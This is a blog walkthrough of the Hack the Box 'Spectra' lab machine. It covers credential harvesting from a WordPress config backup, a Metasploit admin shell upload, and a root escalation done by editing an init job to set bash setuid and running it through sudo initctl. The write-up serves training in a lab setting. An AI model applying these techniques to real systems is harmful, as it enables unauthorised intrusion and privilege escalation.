• Donald Ashdown

Hack the Box - Spectra Walkthrough



Summary

Spectra is a great machine in which your journey will start with WordPress vulnerabilities and a GUI dashboard. Planting a reverse shell and access SSH allows the user to compromise and upgrade their shell on the spectra host. Lastly, the Root privilege escalation comes after checking Sudo run as permissions, to exploit an active process.

Processes\Techniques
  • Dir busting

  • WP bruteforce

  • WP code injection

  • Unauthorized script injection

Tools Used
  • Nothing special


Enumeration

The original nmap scan showed absolutely no ports open and this might be a first for me.


Lets try a stealth scan again, which sadly provides no unique results. We are going to be enumerating blind.


Enumeration Website

Initially the website was returning blank and nothing was loading, which had me stumped until I recalled how much Hack the box loves mapping IP - Hosts as apart of the experience. With this I loaded the spectra.htb to ip mapping in /etc/hosts.


echo '10.129.144.226 > /etc/nano hosts'


The "Software Issue Tracker" takes us to the main page. The test link however brings us to "/testing/index.php/". So this looks pretty offsetting and there is an opportunity to back in to the /testing/ directory.



The directory that stands out the most is /wp-config.php.save. Browsing here shows us a blank page....but given it is a .php script appearing as a backup, lets check the source code of the page.


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'dev' );

/** MySQL database username */
define( 'DB_USER', 'devtest' );

/** MySQL database password */
define( 'DB_PASSWORD', 'devteam01' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

SQL

Well finding those SQL creds is fantastic. however we know from initial enumeration that we cannot gather any information on open ports and have to recourse to blind enumeration. So I tried connecting to mysql but it did not work, which suggests the server is local only.


WP-Login

As with all pentesting you can find low hanging fruit



From here we have several options.


  1. Inject code into theme templates

  2. inject code into a plugin












I attempted to edit and inject a PHP reverse shell into the Hello Dolly plugin, however it was not executing for me.


Attempting to add a plugin I was not able to go down this route due to an error.


Twenty Twenty: 404 Template (404.php) - Editing this template and injecting code seemed like a good idea. But I kept receiving an error as we see below.


Metasploit

Unfortunately I had to resort to metasploit as I could not find another way to pop a shell.


Module options (exploit/unix/webapp/wp_admin_shell_upload):

We use the administrator username here instead of the devtest username.


Moving Horizontally

The provided shell was rather limited and not at all interactive. This left me to enumerate from an absolute path for every query which slowed me down.



ls /opt/
VirtualBox
autologin.conf.orig
broadcom
displaylink
eeti
google
neverware
tpm1
tpm2


We see the autologin.conf.orig as standing out as not ordinary in this location. So I looked into it and there was a reference to /etc/autologin within the passwd variable.

  passwd=
  # Read password from file. The file may optionally end with a newline.
  for dir in /mnt/stateful_partition/etc/autologin /etc/autologin; do
    if [ -e "${dir}/passwd" ]; then
      passwd="$(cat "${dir}/passwd")"
      break

This turned over a password.


Moving to user

With this password we ought to test it against ssh with all users found in /etc/passwd.


Root

Looking at what we can run as Sudo reveals this.


Researching /sbin/initctl showed a well known privilege escalation technique. I have included the link below.


https://isharaabeythissa.medium.com/sudo-privileges-at-initctl-privileges-escalation-technique-ishara-abeythissa-c9d44ccadcb9



sudo -u root /sbin/initctl list

Great we have confirmed we can execute initctl commands.

Just like the guide suggests we browse to /etc/init and edit the test process with nano and add the following code in the script.

script
	chmod +s /bin/bash
end script

sudo -u root /sbin/initctl start test 


-bash-4.3$ whoami

-bash-4.3$ root


27 views0 comments